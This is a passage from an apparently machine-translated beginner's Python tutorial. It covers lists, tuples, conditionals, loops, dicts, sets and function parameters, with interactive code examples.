When str and bytes are converted to each other, the encoding needs to be specified. The most common encoding is UTF-8, and Python certainly supports other encodings, such as encoding Unicode to GB2312.

>>> '中文'.encode('gb2312')
b'\xd6\xd0\xce\xc4'

However, this approach is purely self-defeating. If you have no special business requirements, please keep in mind to use only UTF-8 encoding.

Formatting strings can be tested easily and quickly with Python's interactive environment.

Reference source code

the_string.py

Using lists and tuples

lists

One of Python's built-in data types is a list, an ordered collection of elements that can be added and removed at any time.

For example, listing the names of all the students in a class can be represented by a list.

>>> classmates = ['Michael', 'Bob', 'Tracy']
>>> classmates
['Michael', 'Bob', 'Tracy']

The variable classmates is a list, and the number of elements in the list can be obtained using the len() function.

>>> len(classmates)
3

Use the index to access the element at each position in the list, remembering that the index starts at 0.

>>> classmates[0]
'Michael'
>>> classmates[1]
'Bob'
>>> classmates[2]
'Tracy'
>>> classmates[3]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
IndexError: list index out of range

Python will report an IndexError error when the index is out of range, so make sure the index doesn't go out of bounds, and remember that the index of the last element is len(classmates) - 1.

To fetch the last element, in addition to calculating the index position, you can also use -1 for the index and fetch the last element directly at.

>>> classmates[-1]
'Tracy'

And so on, you can obtain the penultimate one, the penultimate one.

>>> classmates[-2]
'Bob'
>>> classmates[-3]
'Michael'
>>> classmates[-4]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
IndexError: list index out of range

Of course, the penultimate one is out of bounds.

A list is a mutable ordered table, so it is possible to append elements to the end of a list.

>>> classmates.append('Adam')
>>> classmates
['Michael', 'Bob', 'Tracy', 'Adam']

It is also possible to insert an element into a specified position, such as the position with index number 1.

>>> classmates.insert(1, 'Jack')
>>> classmates
['Michael', 'Jack', 'Bob', 'Tracy', 'Adam']

To delete the element at the end of a list, use the pop() method.

>>> classmates.pop()
'Adam'
>>> classmates
['Michael', 'Jack', 'Bob', 'Tracy']

To delete the element at the specified position, use the pop(i) method, where i is the index position.

>>> classmates.pop(1)
'Jack'
>>> classmates
['Michael', 'Bob', 'Tracy']

To replace an element with another element, you can directly assign it to the corresponding index position.

>>> classmates[1] = 'Sarah'
>>> classmates
['Michael', 'Sarah', 'Tracy']

The data types of the elements inside the list can also be different, e.g.

>>> L = ['Apple', 123, True]

A list element can also be another list, e.g.

>>> s = ['python', 'java', ['asp', 'php'], 'scheme']
>>> len(s)
4

Note that s has only 4 elements, where s[2] is again a list, which is easier to understand if you split it up.

>>> p = ['asp', 'php']
>>> s = ['python', 'java', p, 'scheme']

To get 'php' you can write p[1] or s[2][1], so s can be seen as a two-dimensional array, similarly there are three-dimensional and four-dimensional ...... arrays, but they are rarely used.

If a list contains not a single element, it is an empty list, which has length 0.

>>> L = []
>>> len(L)
0

tuple

Another kind of ordered list is called a tuple: tuples. tuples are very similar to lists, but tuples cannot be modified once they are initialized, for example, they also list the names of classmates.

>>> classmates = ('Michael', 'Bob', 'Tracy')

Now, the tuples classmates cannot be changed, and it has no methods like append(), insert(). You can use classmates[0], classmates[-1] as normal, but you cannot assign to another element.

What is the point of immutable tuples? Because tuples are immutable, the code is safer. If possible, try to use a tuple instead of a list.

The tuple trap: When you define a tuple, the elements of the tuple must be identified at the time of definition, e.g.

>>> t = (1, 2)
>>> t
(1, 2)

To define an empty tuples, you can write () as follows:

>>> t = ()
>>> t
()

However, to define a tuples with only 1 element, if you define it like this.

>>> t = (1)
>>> t
1

It's not the tuple that is defined, it's the number 1! This is because the parentheses () can represent both tuple and parentheses in a mathematical formula, which creates ambiguity, so Python specifies that in this case, the calculation is done by parentheses, and the result is naturally 1.

Therefore, tuples with only 1 element must be defined with a comma , to disambiguate.

>>> t = (1,)
>>> t
(1,)

Python also adds a comma , when displaying tuples with only 1 element, so that you don't misinterpret them as parentheses in the mathematical sense.

Finally, look at a "mutable" tuples.

>>> t = ('a', 'b', ['A', 'B'])
>>> t[2][0] = 'X'
>>> t[2][1] = 'Y'
>>> t
('a', 'b', ['X', 'Y'])

This tuple is defined with 3 elements, 'a', 'b' and a list. How come it changed later?

Don't worry, let's first look at the definition of the tuples contain three elements: a'', b'' and a list.

tuple-0

When we modify the elements 'A' and 'B' of the list to 'X' and 'Y', the tuples become:

tuple-1

On the surface, the elements of the tuples do change, but in fact, it is not the elements of the tuples that change, but the elements of the lists. tuples do not change the lists they point to in the beginning to other lists, so the so-called "unchanging" of tuples means that each element of the tuples points to the same list forever. The tuple's so-called "invariant" means that each element of the tuple points to the same element forever. That is, if you point to 'a'', you cannot change it to point to 'b'', and if you point to a list, you cannot change it to point to another object, but the list itself is mutable!

After understanding the "pointing to the same", how to create a tuple whose content also remains the same? Then we must ensure that each element of the tuple itself can not change.

Summary

lists and tuples are Python's built-in ordered collections, one mutable and one immutable. Choose to use them as needed.

Reference source code

the_list.py

the_tuple.py

Conditional Judgment

The computer can do many automated tasks because it can make its own conditional judgments.

For example, entering the user's age and printing different things depending on the age is implemented in a Python program with the if statement.

age = 20
if age >= 18:
    print('your age is', age)
    print('adult')

According to Python's indentation rules, if the if statement is judged to be True, the two lines of the indented print statement are executed, otherwise, nothing is done.

You can also add an else statement to if, meaning that if if is judged to be False, don't execute the if content and go ahead and execute the else.

age = 3
if age >= 18:
    print('your age is', age)
    print('adult')
else:
    print('your age is', age)
    print('teenager')

Be careful not to underwrite the colon :.

Of course the above judgement is very rough, it is perfectly possible to make a more detailed judgement with elif:

age = 3
if age >= 18:
    print('adult')
elif age >= 6:
    print('teenager')
else:
    print('kid')

elif is short for else if, and it is perfectly possible to have more than one elif, so the full form of the if statement is:

if <条件判断1>:
    <执行1>
elif <条件判断2>:
    <执行2>
elif <条件判断3>:
    <执行3>
else:
    <执行4>

The execution of the if statement has a feature that it judges from top to bottom. If True is made on a certain judgment, after executing the statement corresponding to that judgment, the remaining elif and else are ignored. So, please test and explain why the following program prints teenager.

age = 20
if age >= 6:
    print('teenager')
elif age >= 18:
    print('adult')
else:
    print('kid')

The if judgment condition can also be abbreviated, for example by writing.

if x:
    print('True')

As long as x is a non-zero value, a non-empty string, a non-empty list, etc., it is judged to be True, otherwise it is False.

Reconsider input

Finally, let's look at a problematic conditional judgment. Many students will use input() to read the user's input, so that they can enter it themselves and the program runs more interestingly: input().

birth = input('birth: ')
if birth < 2000:
    print('00前')
else:
    print('00后')

Entering 1982 resulted in the following error.

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: unorderable types: str() > int()

This is because the data type returned by input() is str, which cannot be compared directly with an integer and must first be converted from str to an integer. Python provides the int() function to do this.

s = input('birth: ')
birth = int(s)
if birth < 2000:
    print('00前')
else:
    print('00后')

Run it again and you will get the correct result. But what if you type abc? Again, you will get an error message.

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ValueError: invalid literal for int() with base 10: 'abc'

It turns out that the int() function reports an error when it finds a string that is not a legal number, and the program exits.

How do you check for and catch program runtime errors? We'll talk about errors and debugging later.

Summary

Conditional judgments allow the computer to make its own choices, Python's if... .elif... ...else is very flexible.

Conditional judgments match from the top down, executing the corresponding block when the condition is met, and subsequent elifs and else's are no longer executed.

python-if

Reference source code

do_if.py

Loop

To calculate 1+2+3, we can simply write the expression.

>>> 1 + 2 + 3
6

To calculate 1+2+3+... +10, you can barely write it.

However, to calculate 1+2+3+... +10,000, it's impossible to write the expression directly.

In order for the computer to compute thousands of iterations, we need loop statements.

Python has two kinds of loops, a for... .in loops that iterate through each element of a list or tuple in turn, see the example.

names = ['Michael', 'Bob', 'Tracy']
for name in names:
    print(name)

Executing this code will print each element of names in turn.

Michael
Bob
Tracy

So the for x in ... loop is a statement that substitutes each element into the variable x and then executes the indented block.

Another example is if we want to calculate the sum of integers from 1 to 10, we can use a sum variable to do the accumulation.

sum = 0
for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:
    sum = sum + x
print(sum)

If you want to calculate the sum of integers from 1 to 100, it is a bit difficult to write from 1 to 100. Fortunately, Python provides a range() function that can generate a sequence of integers, which can be converted to a list by the list() function. for example, the sequence generated by range(5) is a sequence of integers less than 5 starting from 0.

>>> list(range(5))
[0, 1, 2, 3, 4]

range(101) will generate a sequence of integers from 0-100, calculated as follows.

# -*- coding: utf-8 -*-
sum = 0
for x in range(101):
    sum = sum + x
print(sum)

Please run the above code yourself to see if the result is the 5050 that Gauss students mentally calculated back then.

The second type of loop is the while loop, which keeps looping as long as the conditions are met, and exits the loop when the conditions are not met. For example, if we want to calculate the sum of all odd numbers within 100, we can use a while loop to do the following.

sum = 0
n = 99
while n > 0:
    sum = sum + n
    n = n - 2
print(sum)

Inside the loop, the variable n keeps decreasing itself until it becomes -1, when the while condition is no longer met and the loop exits.

break

In a loop, the break statement can exit the loop early. For example, to have looped to print the numbers 1 to 100.

n = 1
while n <= 100:
    print(n)
    n = n + 1
print('END')

The code above prints out 1 to 100.

To end the loop early, you can use the break statement.

n = 1
while n <= 100:
    if n > 10: # When n = 11, the condition is met and the break statement is executed
        break # The break statement will end the current loop
    print(n)
    n = n + 1
print('END')

As you can see from the above code, after printing out 1~10, END is printed immediately afterwards and the program ends.

It can be seen that the function of break is to end the loop early.

continue

During the loop, you can also skip the current loop and start the next one directly with the continue statement.

n = 0
while n < 10:
    n = n + 1
    print(n)

The above program prints 1 to 10. However, if we want to print only odd numbers, we can skip certain loops with the continue statement.

n = 0
while n < 10:
    n = n + 1
    if n % 2 == 0: # If n is an even number, execute the continue statement
        continue # The continue statement will continue directly to the next loop, and the subsequent print() statement will not be executed
    print(n)

Executing the above code, you can see that it no longer prints 1 to 10, but 1, 3, 5, 7, and 9.

You can see that the purpose of continue is to end the current loop early and start the next one directly.

Summary

Loops are an effective way to get the computer to do repetitive tasks.

The break statement can exit the loop directly during the loop, while the continue statement can end the current round of loops early and start the next round directly. Both of these statements usually must be used in conjunction with the if statement.

Be especially careful not to abuse the break and continue statements. break and continue can cause the code execution logic to bifurcate too much and be prone to errors. Most loops do not require the use of break and continue statements, and both of the above examples can be done by rewriting the loop condition or modifying the loop logic to remove the break and continue statements.

In some cases, if the code is written in a problematic way, the program will fall into a "dead loop", that is, a loop that goes on forever. In this case, you can use Ctrl+C to exit the program or force the Python process to end.

Please try to write a dead loop program.

Reference source code

do_for.py

do_while.py

Using dict and set

dict

Python has built-in support for dictionaries: dict, also known as dictionary or map in other languages, uses key-value storage and is extremely fast to find.

For example, suppose you want to find the corresponding grades based on the names of your classmates, and if you implement it with lists, you need two lists.

names = ['Michael', 'Bob', 'Tracy']
scores = [95, 75, 85]

Given a name, to find the corresponding score, you have to find the corresponding position in names and then take out the corresponding score from scores, the longer the list, the longer it takes.

If we use a dict, we only need a "name" - "score" comparison table, and we can find the scores according to the names directly, no matter how big the table is, the search speed will not be slow. Write a dict in Python as follows.

>>> d = {'Michael': 95, 'Bob': 75, 'Tracy': 85}
>>> d['Michael']
95

Why is dict lookup so fast? Because the principle of dict implementation is the same as looking up a dictionary. Suppose the dictionary contains 10,000 Chinese characters, and we want to look up a certain word, one way is to turn the dictionary backward from the first page until we find the word we want, this method is the method of finding elements in the list, the larger the list is, the slower the search is.

The second way is to look up the page number corresponding to the word in the index table of the dictionary (e.g., the part number table), and then turn directly to that page and find the word. No matter which word you are looking for, this search is very fast and does not slow down as the size of the dictionary increases.

Given a name, such as 'Michael', dict can internally calculate the "page number" of Michael, which is the memory address where the number 95 is stored, and take it out directly, so it is very fast.

As you can guess, this key-value storage method, when you put it in, you must calculate the storage location of the value according to the key, so that when you take it, you can get the value directly according to the key.

The method of putting data into dict, in addition to the initialization specified, can also be put in by key.

>>> d['Adam'] = 67
>>> d['Adam']
67

Since a key can only correspond to a value, putting a value to a key multiple times will flush out the previous value.

>>> d['Jack'] = 90
>>> d['Jack']
90
>>> d['Jack'] = 88
>>> d['Jack']
88

If the key does not exist, dict will report an error.

>>> d['Thomas']
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
KeyError: 'Thomas'

To avoid the error that the key does not exist, there are two ways, one is to determine whether the key exists by in.

>>> 'Thomas' in d
False

The second is through the get() method provided by dict, which can return None if the key does not exist, or the value specified by itself.

>>> d.get('Thomas')
>>> d.get('Thomas', -1)
-1

Note: Python's interactive environment does not show the result when None is returned.

To delete a key, use the pop(key) method, and the corresponding value will also be deleted from the dict.

>>> d.pop('Bob')
75
>>> d
{'Michael': 95, 'Tracy': 85}

Be sure to note that the order of storage inside a dict has no relation to the order in which the keys are placed.

Compared with list, dict has the following features.

the speed of lookup and insertion is extremely fast and does not slow down with the increase of keys.
it takes up a lot of memory and wastes a lot of memory.

On the contrary, list has the following features.

the search and insertion time increases with the increase of elements.
takes up little space and wastes little memory.

So, dict is a way to trade space for time.

dict can be used in many places where high-speed lookup is needed, and it is almost ubiquitous in Python code. It is very important to use dict correctly, and the first thing to keep in mind is that the key of dict must be immutable object.

This is because dict calculates the storage location of value based on key, and if each time the same key is calculated the result is different, then the dict is completely confused internally. This algorithm for calculating the location by key is called a hash algorithm (Hash).

To ensure the correctness of the hash, the object that is the key cannot change. In Python, strings, integers, etc. are immutable and can therefore be safely used as keys, whereas lists are mutable and cannot be used as keys.

>>> key = [1, 2, 3]
>>> d[key] = 'a list'
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: unhashable type: 'list'

set

A set is similar to a dict in that it is also a set of keys, but does not store values. since keys cannot be duplicated, there are no duplicate keys in a set.

To create a set, a list is provided as the input set.

>>> s = set([1, 2, 3])
>>> s
{1, 2, 3}

Note that the passed parameter [1, 2, 3] is a list, and the displayed {1, 2, 3} just tells you that there are 3 elements inside this set, 1, 2, 3, and the displayed order does not indicate that the set is ordered.

Duplicate elements are automatically filtered in the set.

>>> s = set([1, 1, 2, 2, 3, 3])
>>> s
{1, 2, 3}

Elements can be added to the set by the add(key) method, which can be repeated, but will not have the effect of.

>>> s.add(4)
>>> s
{1, 2, 3, 4}
>>> s.add(4)
>>> s
{1, 2, 3, 4}

Elements can be removed by the remove(key) method.

>>> s.remove(4)
>>> s
{1, 2, 3}

set can be seen as a mathematically unordered and non-repetitive set of elements, so that two sets can be intersected, merged, etc. in the mathematical sense.

>>> s1 = set([1, 2, 3])
>>> s2 = set([2, 3, 4])
>>> s1 & s2
{2, 3}
>>> s1 | s2
{1, 2, 3, 4}

The only difference between set and dict is that there is no corresponding value stored, but the principle of set is the same as dict, so it is also not possible to put mutable objects into it, because there is no way to determine whether two mutable objects are equal, and there is no guarantee that there will be "no duplicate elements" inside the set. Try putting a list into set and see if you get an error.

Re-discuss immutable objects

As we said above, str is an immutable object, while list is a mutable object.

For mutable objects, such as list, the contents of list will change if list is manipulated, for example.

>>> a = ['c', 'b', 'a']
>>> a.sort()
>>> a
['a', 'b', 'c']

And for immutable objects, such as str, what about operations on str.

>>> a = 'abc'
>>> a.replace('a', 'A')
'Abc'
>>> a
'abc'

Although the string has a replace() method, and it does turn out to be 'Abc', the variable a still ends up being 'abc', so how should we understand it?

Let's change the code to the following.

>>> a = 'abc'
>>> b = a.replace('a', 'A')
>>> b
'Abc'
>>> a
'abc'

The thing to always keep in mind is that a is the variable, and 'abc' is the string object! There are times when we often say that the content of the object a is 'abc', but what we really mean is that a itself is a variable, and it is the content of the object it points to that is 'abc'.

┌───┐                  ┌───────┐
│ a │─────────────────>│ 'abc' │
└───┘                  └───────┘

When we call a.replace('a', 'A'), the call to method replace actually acts on the string object 'abc', and the method, despite its name replace, does not change the content of the string 'abc'. Instead, the replace method creates a new string 'Abc' and returns it, and if we use the variable b to point to that new string, it is easy to understand that the variable a still points to the original string 'abc', but the variable b points to the new string 'Abc'.

┌───┐                  ┌───────┐
│ a │─────────────────>│ 'abc' │
└───┘                  └───────┘
┌───┐                  ┌───────┐
│ b │─────────────────>│ 'Abc' │
└───┘                  └───────┘

So, for immutable objects, calling any method on the object itself will not change the content of the object itself. Instead, these methods create new objects and return them, thus ensuring that the immutable object itself is always immutable.

Summary

Using a key-value storage structure for dict is very useful in Python. It is important to choose immutable objects as keys, and the most common key is a string.

While tuple is an immutable object, try putting (1, 2, 3) and (1, [2, 3]) into a dict or set and interpret the results.

Reference source code

the_dict.py

the_set.py

Python Programming Quick Guide - Functions

https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832

https://docs.python.org/3/tutorial/index.html

Function

We know that the formula for calculating the area of a circle is

S = πr^2

When we know the value of radius r, we can calculate the area according to the formula. Suppose we need to calculate the area of 3 circles of different sizes.

r1 = 12.34
r2 = 9.08
r3 = 73.1
s1 = 3.14 * r1 * r1
s2 = 3.14 * r2 * r2
s3 = 3.14 * r3 * r3

When there is a regular repetition of the code, you need to beware that writing 3.14 * x * x each time is not only troublesome, but, if you want to change 3.14 to 3.14159265359, you have to replace it all.

With functions, instead of writing s = 3.14 * x * x every time, we write the more meaningful function call s = area_of_circle(x), and the function area_of_circle itself only needs to be written once, so it can be called multiple times.

Basically all high-level languages support functions, and Python is no exception. not only can Python be very flexible in defining functions, but it has many useful functions built in itself that can be called directly.

Abstraction

Abstraction is a very common concept in mathematics. As an example.

Calculating the sum of a series, e.g., 1 + 2 + 3 + ... + 100, is very inconvenient to write, so mathematicians invented the summation symbol ∑, which can be written as 1 + 2 + 3 + ... + 100 is written as.

sum1_100

This abstract notation is very powerful because we see that ∑ can be understood as a summation, rather than reducing to a low-level addition operation.

Moreover, this abstract notation is scalable, e.g.

sum1_100_2

Reduced to addition it becomes.

(1 x 1 + 1) + (2 x 2 + 1) + (3 x 3 + 1) + ... + (100 x 100 + 1)

As you can see, abstraction allows us to think directly at a higher level, without caring about the underlying concrete computational process.

Writing computer programs is the same, and functions are one of the most basic ways of abstracting code.

Calling functions

Python has a lot of useful functions built in that we can call directly.

To call a function, you need to know the name of the function and its arguments, for example, the function abs that finds the absolute value has only one argument. The documentation can be viewed directly from Python's official website at

http://docs.python.org/3/library/functions.html#abs

You can also view the help information for the abs function at the interactive command line via help(abs).

To invoke the abs function.

>>> abs(100)
100
>>> abs(-20)
20
>>> abs(12.34)
12.34

Calling a function with the wrong number of arguments passed in will report a TypeError error, and Python will tell you explicitly that abs() has and only has 1 argument, but gives two.

>>> abs(1, 2)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: abs() takes exactly one argument (2 given)

If the number of arguments passed in is correct, but the argument type is not accepted by the function, a TypeError error is also reported and the error message is given: str is the wrong argument type.

>>> abs('a')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: bad operand type for abs(): 'str'

And the max function max() can take any number of arguments and return the largest one.

>>> max(1, 2)
2
>>> max(2, 3, 1, -5)
3

Data type conversions

Python's built-in common functions also include data type conversion functions, such as the int() function that converts other data types to integers:

>>> int('123')
123
>>> int(12.34)
12
>>> float('12.34')
12.34
>>> str(1.23)
'1.23'
>>> str(100)
'100'
>>> bool(1)
True
>>> bool('')
False

A function name is actually a reference to a function object, and it is possible to assign the function name to a variable, which is equivalent to giving the function an "alias".

>>> a = abs # Variable a points to the abs function
>>> a(-1) # So you can also call the abs function from a
1

Define function

In Python, to define a function you use the def statement, write the function name, the parentheses, the arguments in the parentheses, and the colon : in that order, then, write the function body in an indented block, and the return value of the function is returned with the return statement.

Let's take a custom my_abs function for absolute values as an example.

# -*- coding: utf-8 -*-
def my_abs(x):
    if x >= 0:
        return x
    else:
        return -x

print(my_abs(-99))

Please test it yourself and call my_abs to see if the returned result is correct.

Note that when the statements inside the function body are executed, once they reach return, the function is executed and the result is returned. Thus, very complex logic can be implemented inside functions through conditional judgments and loops.

If there is no return statement, the function will also return the result when it finishes executing, but the result will be None. return None can be abbreviated to return.

When defining functions in the Python interactive environment, note that Python will show a ... prompt. When you finish defining the function you need to press enter twice to get back to the >>> prompt.

┌────────────────────────────────────────────────────────┐
│Command Prompt - python                           - □ x │
├────────────────────────────────────────────────────────┤
│>>> def my_abs(x):                                      │
│...     if x >= 0:                                      │
│...         return x                                    │
│...     else:                                           │
│...         return -x                                   │
│...                                                     │
│>>> my_abs(-9)                                          │
│9                                                       │
│>>> _                                                   │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

If you have already saved the function definition of my_abs() as an abstest.py file, then you can start the Python interpreter in the current directory of that file and import the my_abs() function with from abstest import my_abs, noting that abstest is the file name (without the . py extension).

┌────────────────────────────────────────────────────────┐
│Command Prompt - python                           - □ x │
├────────────────────────────────────────────────────────┤
│>>> from abstest import my_abs                          │
│>>> my_abs(-9)                                          │
│9                                                       │
│>>> _                                                   │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
│                                                        │
└────────────────────────────────────────────────────────┘

The usage of import is described in detail in the subsequent section Modules.

Empty functions

If you want to define an empty function that doesn't do anything, you can use the pass statement.

def nop():
    pass

The pass statement doesn't do anything, so what's the point? Actually pass can be used as a placeholder, for example, if you haven't figured out how to write the code for a function yet, you can put a pass first so that the code can run.

pass can also be used in other statements, such as.

if age >= 18:
    pass

Missing pass, the code will run with syntax errors.

Parameter checking

When calling a function with the wrong number of arguments, the Python interpreter will automatically check for it and throw TypeError:

>>> my_abs(1, 2)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: my_abs() takes 1 positional argument but 2 were given

But if the argument type is wrong, the Python interpreter can't check it for us. Try the difference between my_abs and the built-in function abs.

>>> my_abs('A')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 2, in my_abs
TypeError: unorderable types: str() >= int()
>>> abs('A')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: bad operand type for abs(): 'str'

The built-in function abs checks for parameter errors when improper parameters are passed in, while the my_abs we defined has no parameter checking and will cause an error in the if statement with a different error message than abs. So, this function definition is not good enough.

Let's modify the definition of my_abs to do an argument type check and allow only arguments of integer and floating point types. The data type check can be implemented with the built-in function isinstance().

def my_abs(x):
    if not isinstance(x, (int, float)):
        raise TypeError('bad operand type')
    if x >= 0:
        return x
    else:
        return -x

With the addition of parameter checking, the function can throw an error if the wrong type of parameter is passed in.

>>> my_abs('A')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 3, in my_abs
TypeError: bad operand type

Error and exception handling will be covered later.

Returning multiple values

Can a function return more than one value? The answer is yes.

For example, in a game where you often need to move from one point to another, given the coordinates, displacement and angle, you can calculate the new coordinates as follows.

import math

def move(x, y, step, angle=0):
    nx = x + step * math.cos(angle)
    ny = y - step * math.sin(angle)
    return nx, ny

The import math statement indicates that the math package is imported and allows subsequent code to reference the sin, cos and other functions in the math package.

Then, we can get both the return values.

>>> x, y = move(100, 100, 60, math.pi / 6)
>>> print(x, y)
151.96152422706632 70.0

But in fact this is only an illusion, and the Python function still returns a single value:

>>> r = move(100, 100, 60, math.pi / 6)
>>> print(r)
(151.96152422706632, 70.0)

The original return value is a tuple! However, in syntax, returning a tuple can omit the parentheses, and multiple variables can receive a tuple at the same time, assigned to the corresponding value by position, so Python's function returns multiple values is actually returning a tuple, but it's easier to write.

Summary

When defining a function, you need to determine the function name and the number of arguments.

If necessary, you can first check the data types of the arguments.

return can be used inside the function body to return the result of the function at any time.

If the function is executed and there is no return statement, it automatically returns None.

The function can return multiple values at the same time, but it is actually a tuple.

Reference source code

def_func.py

Parameters of a function

When defining a function, we name and locate the parameters and the interface definition of the function is complete. For the caller of the function, it's enough to know how to pass the right arguments and what value the function will return; the complex logic inside the function is encapsulated and the caller doesn't need to understand it.

Python's function definitions are very simple, but very flexible. In addition to the normal definition of mandatory arguments, you can also use default, variable, and keyword arguments, making the function definition an interface that not only handles complex arguments, but also simplifies the caller's code.

positional parameters

Let's start by writing a function that calculates x2:

def power(x):
    return x * x

For the power(x) function, the argument x is a position parameter.

When we call the power function, we must pass in one and only one parameter x.

>>> power(5)
25
>>> power(15)
225

Now, what if we want to calculate x3? We can define another power3 function, but what if we want to calculate x4, x5 ......? We can't define an infinite number of functions.

It may have occurred to you that you can modify power(x) to power(x, n) to compute xn, and to do so, say.

def power(x, n):
    s = 1
    while n > 0:
        n = n - 1
        s = s * x
    return s

For this modified power(x, n) function, any nth power can be computed as follows.

>>> power(5, 2)
25
>>> power(5, 3)
125

The modified power(x, n) function has two parameters: x and n, both of which are positional parameters. When the function is called, the two values passed in are assigned to the parameters x and n in order of position.

Default parameters

The new power(x, n) function definition is fine, however, the old calling code fails because we added an argument, causing the old code to fail to call properly because of a missing argument: the

>>> power(5)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: power() missing 1 required positional argument: 'n'

Python's error message is clear: the call to the function power() is missing a positional argument n.

This is where the default parameter comes into play. Since we often calculate x2, it is perfectly acceptable to set the default value of the second argument, n, to 2.

def power(x, n=2):
    s = 1
    while n > 0:
        n = n - 1
        s = s * x
    return s

Thus, when we call power(5), it is equivalent to calling power(5, 2).

>>> power(5)
25
>>> power(5, 2)
25

For other cases where n > 2, n must be passed explicitly, such as power(5, 3).

As you can see from the above example, default parameters can simplify function calls. When setting default parameters, there are a few things to keep in mind.

One is that the mandatory parameters come first and the default parameters come second, otherwise Python's interpreter will report an error (think about why the default parameters can't be placed in front of the mandatory parameters).

Second, how to set the default parameters.

When a function has more than one parameter, put the parameters that change a lot in front and the parameters that change a little in the back. The parameter with small changes can then be used as the default parameter.

What are the benefits of using default parameters? The biggest benefit is that it reduces the difficulty of calling the function.

For example, let's write a function to register a first grade student and pass in two parameters name and gender.

def enroll(name, gender):
    print('name:', name)
    print('gender:', gender)

In this way, the enroll() function is called with only two parameters passed in.

>>> enroll('Sarah', 'F')
name: Sarah
gender: F

What if I want to continue passing in information such as age, city, etc.? This would make calling the function much more complicated.

We can set age and city as default parameters.

def enroll(name, gender, age=6, city='Beijing'):
    print('name:', name)
    print('gender:', gender)
    print('age:', age)
    print('city:', city)

In this way, most students are not required to provide their age and city when registering, but only the two required parameters.

>>> enroll('Sarah', 'F')
name: Sarah
gender: F
age: 6
city: Beijing

Only students who do not match the default parameters will be required to provide additional information.

enroll('Bob', 'M', 7)
enroll('Adam', 'M', city='Tianjin')

As you can see, the default arguments reduce the difficulty of function calls, and once more complex calls are needed, more arguments can be passed to achieve them. Whether it is a simple call or a complex call, the function only needs to define one.

When there are multiple default parameters, the call can either provide the default parameters in order, such as calling enroll('Bob', 'M', 7), meaning that, in addition to the two parameters name, gender, the last 1 parameter is applied to the parameter age, and the city parameter, since it is not provided, still uses the default value.

It is also possible to provide partial default parameters out of order. When providing partial default parameters out of order, you need to put the parameter name on. For example, calling enroll('Adam', 'M', city='Tianjin') means that the city parameter uses the value passed in and the other default parameters continue to use the default values.

Default parameters are useful, but they can fall into a hole if not used properly. The default parameters have one of the biggest pits, as demonstrated below.

First define a function, pass in a list, add an END and then return.

def add_end(L=[]):
    L.append('END')
    return L

When you call it normally, the result seems good:

>>> add_end([1, 2, 3])
[1, 2, 3, 'END']
>>> add_end(['x', 'y', 'z'])
['x', 'y', 'z', 'END']

When you call with the default parameters, the result is also correct at first:

>>> add_end()
['END']

However, when add_end() is called again, the result is not correct:

>>> add_end()
['END', 'END']
>>> add_end()
['END', 'END', 'END']

Many beginners are puzzled by the fact that the default argument is [], but the function seems to "remember" the list after adding 'END' each time.

The reason for this is as follows.

When a Python function is defined, the value of the default parameter L is calculated, i.e. [], because the default parameter L is also a variable that points to the object [], and each time the function is called, if the content of L is changed, the content of the default parameter will change the next time it is called, and will no longer be the [] of the function when it is defined.

One thing to keep in mind when defining default parameters: they must point to invariant objects!

To modify the above example, we can use the invariant object None to implement.

def add_end(L=None):
    if L is None:
        L = []
    L.append('END')
    return L

Now, no matter how many times it is called, there will be no problem:

>>> add_end()
['END']
>>> add_end()
['END']

Why do we design invariant objects like str and None? Because once the invariant object is created, the data inside the object cannot be modified, which reduces the errors caused by modifying the data. In addition, because the object is invariant, there is no need to add locks to read the object simultaneously in a multitasking environment, and there is no problem reading it simultaneously at all. When we write a program, if we can design an invariant object, then try to design it as invariant object.

Variable arguments

Variable parameters can also be defined in Python functions. As the name implies, a variable parameter is a variable number of arguments passed in, from 1, 2 to any number, and 0.

Let's take a math problem as an example, given a set of numbers a, b, c ......, calculate a^2 + b^2 + c^2 + .......

To define this function, we must determine the input parameters. Since the number of parameters is uncertain, we first think that we can pass a, b, c ...... as a list or a tuple, so that the function can be defined as follows.

def calc(numbers):
    sum = 0
    for n in numbers:
        sum = sum + n * n
    return sum

But to call it, a list or tuple needs to be assembled first:

>>> calc([1, 2, 3])
14
>>> calc((1, 3, 5, 7))
84

If variable parameters are utilized, the way the function is called can be simplified as follows.

>>> calc(1, 2, 3)
14
>>> calc(1, 3, 5, 7)
84

So, we change the parameters of the function to variable parameters.

def calc(*numbers):
    sum = 0
    for n in numbers:
        sum = sum + n * n
    return sum

Defining a variable parameter is simply a matter of adding a * sign in front of the parameter compared to defining a list or tuple parameter. Inside the function, the argument numbers is received as a tuple, so the function code remains exactly the same. However, the function can be called with any number of arguments, including 0 arguments.

>>> calc(1, 2)
5
>>> calc()
0

What if I already have a list or tuple and want to call a mutable parameter? This can be done.

>>> nums = [1, 2, 3]
>>> calc(nums[0], nums[1], nums[2])
14

The problem is that it's too cumbersome, so Python allows you to add a * sign in front of a list or tuple and pass the elements of the list or tuple as mutable arguments.

>>> nums = [1, 2, 3]
>>> calc(*nums)
14

*nums means that all elements of the list nums are passed in as mutable arguments. This writing style is quite useful and common.

Keyword arguments

Variable arguments allow you to pass in zero or any number of arguments, which are automatically assembled into a tuple when the function is called, while keyword arguments allow you to pass in zero or any number of arguments with parameter names, which are automatically assembled into a dict inside the function. see the example.

def person(name, age, **kw):
    print('name:', name, 'age:', age, 'other:', kw)

The function person accepts the keyword argument kw in addition to the mandatory arguments name and age. When calling this function, only the mandatory parameters can be passed.

>>> person('Michael', 30)
name: Michael age: 30 other: {}

Any number of keyword parameters can also be passed in.

